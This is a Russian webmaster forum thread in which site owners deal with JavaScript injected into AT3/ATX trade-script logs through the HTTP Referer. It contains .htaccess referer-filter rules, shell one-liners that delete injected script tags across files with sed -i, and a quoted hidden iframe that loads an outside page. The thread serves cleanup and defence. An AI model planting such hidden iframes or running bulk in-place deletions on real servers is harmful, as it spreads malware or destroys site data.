С нами с 04.05.06
Сообщения: 3180
Рейтинг: 1379
|
 Добавлено: 17/03/08 в 00:55 |
тоже интересует вопрос
в плане уязвимости атл3 и атх отличия есть?
|
|
|
|
| |
Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
| Добавлено: 17/03/08 в 02:56 |
нету разницы.
|
|
|
|
| |
С нами с 18.03.08
Сообщения: 11
Рейтинг: 3
|
| Добавлено: 18/03/08 в 09:31 |
| Код: | RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?<\?(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?\?>(.*)?$ [NC]
RewriteRule .* http://google.com/ [L] |
А можно расшифровать этот htaccess ?
для чего конкретно нужна последняя строчка ? Если я правильно понял - то нужно прописать yahoo и другие поисковики ?
|
|
|
|
| |
С нами с 07.09.04
Сообщения: 763
Рейтинг: 874
|
| Добавлено: 18/03/08 в 09:51 |
если в рефе пришедшего посетителя содержеться: document.write\(unescape то такой юзер идет примяком на гуглю.
хацкеры подставляют в рефе данную строку чтоб трояна запихать.
|
|
|
|
| |
С нами с 18.03.08
Сообщения: 11
Рейтинг: 3
|
| Добавлено: 18/03/08 в 10:29 |
приятно =) a пихать это в корневую папку или в cgi-bin/at3 ?
|
|
|
|
| |
Гражданин планеты Земля
С нами с 30.03.03
Сообщения: 7217
Рейтинг: 2185
|
| Добавлено: 18/03/08 в 10:39 |
в корень
|
|
|
|
| |
С нами с 27.11.05
Сообщения: 945
Рейтинг: 930
|
| Добавлено: 18/03/08 в 11:16 |
| Soft-Com писал: | неплохо работает такой вариант защиты:
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC]
|
и че, правда работает? с каких это пор параметры модреврайтом через HTTP_REFERER фильтруются?
|
|
|
|
| |
С нами с 28.06.04
Сообщения: 221
Рейтинг: 187
|
| Добавлено: 18/03/08 в 13:14 |
Ебать. Тоже понасовали.
Soft-Com: поискал этой строкой (for file in locate x2.cgi do path и тп) - нашел как у всех в at3/l/in/ и в at3/l/sys/. Не подскажешь что в твою эту строку дописать, чтоб он все что нашел - покилял?
|
|
|
|
| |
С нами с 18.03.08
Сообщения: 11
Рейтинг: 3
|
| Добавлено: 18/03/08 в 14:10 |
запустил софткомовскую комманду
насовали по самые помидоры в l/sys и l/in =(
а вот в самих html страницах на сайтах ничего нет (может пока)
как избавиться от заразы ? защиту я уже поставил через htaccessы
и теперь как я понимаю нужно менять пароли везде ? ну там мускл базы от st, от самого st, atx/ at3 и тд ?
|
|
|
|
| |
С нами с 28.01.06
Сообщения: 380
Рейтинг: 588
|
| Добавлено: 18/03/08 в 15:05 |
| shahfil писал: | | и че, правда работает? с каких это пор параметры модреврайтом через HTTP_REFERER фильтруются? |
а с тех самых пор когда этот модреврайт начали пихать вот таким вот способом
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 18/03/08 в 15:08 |
| shahfil писал: | | и че, правда работает? с каких это пор параметры модреврайтом через HTTP_REFERER фильтруются? |
мистика, но факт - работает.
И судя по в сему именно с тех пор, как модреврайт стал парсить заголовки запросов, а именно с самого начала существования этого модуля.
учи матчасть
http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 18/03/08 в 15:55 |
лучше всего чистить так:
| Код: | cd /tmp;
for file in `locate x2.cgi`; do path=`echo $file | awk -F"/x/x2.cgi" '{print $1}'`; grep -r "document.write(unesca" $path/l/* | awk -F":" '{print $1}' | xargs sed -i 's/<script.*document.write.*unesca.*<\/script>//g'; done |
таким образом почистятся логи и статсы АТ3/АТХ от js-инклюда.
подобной же командой можно почистить и контент домена.
P.S.
через АТ3/АТХ можно поломать любую связку скриптов - как я уже писал раньше, можно порутать машину через это решето ...
|
|
|
|
| |
С нами с 28.06.04
Сообщения: 221
Рейтинг: 187
|
| Добавлено: 18/03/08 в 20:23 |
Мде. Печально все это.
2Админы СмартСЖ - может вы таки правда подумаете на тему скрипта за % траффа? Можете сделать какой-нить опрос типа кто будет этим пользоваться (с указанием имеющегося траффа), прикините ~ кол-во К в сутки котое вы сможете получать... 
|
|
|
|
| |
С нами с 05.11.05
Сообщения: 1563
Рейтинг: 1240
|
| Добавлено: 18/03/08 в 23:34 |
разъясните плиз
если x2 login и admin.cgi закрыты хтакцессо
есть ли какая то опасность? т.е. даже если кто-то получает пасс от админки (через нотрэйд) как он попадет в админку если он ее не видит даже?
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 18/03/08 в 23:47 |
есть вероятность того, что выставив самому себе украденую (правильную) куку, можно непосредственным обращением к скриптам АТ3/АТХ менять параметры и т.д. и т.п. - никто веть не знает интерфейса всех скриптов ...
|
|
|
|
| |
С нами с 06.03.04
Сообщения: 5352
Рейтинг: 1678
|
| Добавлено: 19/03/08 в 01:02 |
| kazantipman писал: | разъясните плиз
если x2 login и admin.cgi закрыты хтакцессо
есть ли какая то опасность? т.е. даже если кто-то получает пасс от админки (через нотрэйд) как он попадет в админку если он ее не видит даже? |
есть, учи матчасть (линухи, подмена IP)
|
|
|
|
| |
IDDQD
С нами с 30.08.05
Сообщения: 5545
Рейтинг: 2710
|
| Добавлено: 19/03/08 в 01:44 |
биля пиздец. даже в мой дохлый сидж запихнули и вообще наверно дедик придется проверять, вот же мазготни из-за ебучего ат3.......
|
|
|
|
| |
С нами с 26.02.07
Сообщения: 219
Рейтинг: 155
|
| Добавлено: 19/03/08 в 03:15 |
| Soft-Com писал: | лучше всего чистить так:
| Код: | cd /tmp;
for file in `locate x2.cgi`; do path=`echo $file | awk -F"/x/x2.cgi" '{print $1}'`; grep -r "document.write(unesca" $path/l/* | awk -F":" '{print $1}' | xargs sed -i 's/<script.*document.write.*unesca.*<\/script>//g'; done |
таким образом почистятся логи и статсы АТ3/АТХ от js-инклюда.
|
предлагаю несколько расширить круг поиска, ибо попался инклуд через document.scripts
плюс не всегда стОит полагаться на locate, имеет смысл вместо него использовать find
| Код: | | for file in `find /home/ -name x2.cgi`; do path=`echo $file | awk -F"/x/x2.cgi" '{print $1}'`; grep -r "document." $path/l/* | awk -F":" '{print $1}' | xargs sed -i 's/<script.*document\..*<\/script>//g'; done |
/home/ замените на свой каталог с доменами, если отличается
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 19/03/08 в 06:44 |
да важное замечание - но для меня такое не подойдёт, у некоторых моих кастомеров кука выставляется подобным образом для трейда (если парсить контент имеется в виду)...
так что во тут как раз АВМ-мам уже стоит самим решать ... нанимать им администратора или нет .
Последний раз редактировалось: Soft-Com (19/03/08 в 07:20), всего редактировалось 1 раз
|
|
|
|
| |
С нами с 12.08.05
Сообщения: 265
Рейтинг: 125
|
| Добавлено: 19/03/08 в 07:15 |
Хорошо что так и не купил ATX, снес к чертям атл со всех сайтов, прочитав этот топик.
|
|
|
|
| |
С нами с 24.03.04
Сообщения: 10716
Рейтинг: 3949
|
| Добавлено: 19/03/08 в 09:28 |
| beto писал: | | <iframe src="http://ebony-hardcore.net/streamrotator/z/static.php" width=2 height=2 style="display:none"></iframe> |
это мой домен. к чему бы это?
|
|
|
|
| |
С нами с 24.03.04
Сообщения: 10716
Рейтинг: 3949
|
| Добавлено: 19/03/08 в 09:28 |
так все таки? чего делать то у когло alfaporn в реферах??
|
|
|
|
| |
С нами с 07.10.03
Сообщения: 5194
Рейтинг: 3325
|
| Добавлено: 19/03/08 в 09:30 |
| slonic писал: | | это мой домен. к чему бы это? |
Оффтопик: тебя вычеслии, ты тот самы хакер
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 19/03/08 в 09:43 |
| slonic писал: | | так все таки? чего делать то у когло alfaporn в реферах?? |
заблокировать всё левое в хтаксесе а потом почистить логи и статсы.
|
|
|
|
| |
С нами с 24.03.04
Сообщения: 10716
Рейтинг: 3949
|
| Добавлено: 19/03/08 в 09:51 |
| Soft-Com писал: | | заблокировать всё левое в хтаксесе а потом почистить логи и статсы. |
а можно каким нить доступным языком где нить почитатать как и что делать пошагово?
сенкс тебе, добрый человек
|
|
|
|
| |
